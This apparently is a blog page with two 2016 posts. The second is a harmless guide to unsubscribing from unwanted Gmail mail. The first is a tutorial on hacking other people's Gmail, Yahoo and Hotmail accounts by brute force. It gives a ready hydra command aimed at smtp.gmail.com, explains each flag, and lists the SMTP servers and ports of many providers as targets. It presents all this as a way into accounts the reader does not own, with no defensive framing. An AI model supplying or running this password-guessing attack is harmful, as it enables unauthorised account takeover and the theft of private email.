Showing posts with label email. Show all posts
Showing posts with label email. Show all posts

Sunday, 28 August 2016

How to hack email , gmail,yahoo

Today I will tell you how to brute-force and hack any gmail, yahoo or hotmail account on linux...
Whats is BruteForce?
Bruteforcing:- It is method in which we request the server if the password we provide is correct or not..
How we can hack password with Brute-Force?
We will create a list of possible passwords and will ask hydra to request the server if these are correct or not.
How can we guess correct password?
Password.list :- We can create a list of all alphabets and 1-9 counting and ask the hydra to request the server with all the possible password that can be created using alphabets,1-9 (counting)and @#$%^ (special characters).
But we will not do it like that, that can take years because the possible passwords will exceed billions.
I will tell you to create a password list yourself or get one from [Here]
Steps :-
Create password's list
Save it to Desktop (ctrl+o) to save and (ctrl+x) to exit.

Command :-
hydra -l [Email ID] -P [password's list] -s [port] -S -t 1 -v -V smtp.gmail.com smtp
Hydra = Software that we will use
-l         = The Email Id you wanna hack
-L        = If you have a List of Emails
-p        = If you have a Password
-P        = The Password's list
-s        = Port of the server
-S        = SSL encryption (method)
-v        = View what is behind the scene
-V        = View the Passwords being used
-t         = Number of time it will check  one password.
smtp   = Server type....
We can only hack SMTP servers with brute forcing
Here is a list of SMTP email servers and their ports which can be hacked

Server | Security | Port

Gmail

smtp.gmail.com | SSL | 465

Yahoo Mail

smtp.mail.yahoo.com | SSL | 465

Yahoo Mail Plus

plus.smtp.mail.yahoo.com | SSL | 465

Yahoo UK

smtp.mail.yahoo.co.uk | SSL | 465

Yahoo Deutschland

smtp.mail.yahoo.com | SSL | 465

Yahoo AU/NZ

smtp.mail.yahoo.com.au | SSL | 465

O2

smtp.o2.ie | none | 25

O2.uk

smtp.o2.co.uk | none | 25

AT&T

smtp.att.yahoo.com | SSL | 465

Hotmail

smtp.live.com | SSL | 465

zoho Mail

smtp.zoho.com | SSL | 465

GMX.com

smtp.gmx.com | SSL | 465
For more servers visit 

Arclab

Watch the video for much graphical Demonstration


Get a step-b-Step command  text file... Below
Brute-Forcing text file...
 Get a step-b-Step command  text fileBrute-Forcing text file...

Thursday, 25 August 2016

How To Unsubscribe All Unwanted Mails On Gmail

I have been receiving Mails from many online sites like Amazon, Snapdeal, Paytm, Slide Share, Softonic etc.. There were so many mails from so many companies that i was unable to unsubscribe all these one by one by rechecking all mails and clicking unsubscribe on these therefore, I started searching for a solution of unsubscribing all these easily and what result I get were amazing. Two ways are given below the second way is just amazing

1.The Main Way

Google has integrated an easy new option for Gmail users to get rid of unwanted mails by clicking Unsubscribe.
Gmail users will now be able to unsubscribe to mails received as brand promotions, social or forums messages, and more. The Unsubscribe option will be available on the top of the email as a link, right next to the sender address.
ONE MORE WAY IS TO -
  1. Click on the mail which you want to unsubscribe
  2. Now click on 1
Now Click on Unsubscribe and Report Scam2.jpg "Done"

2. Unroll.me

  1. It is very simple and a very handy tool to unsubscribe easily.
  2. GOTO Unroll.me
  3. Register and Now your all mails will open
  4. Now click on UNSUBSCRIBE for the one you want to Unsubscribe.

Thanks and Regards for any quarries comment below.....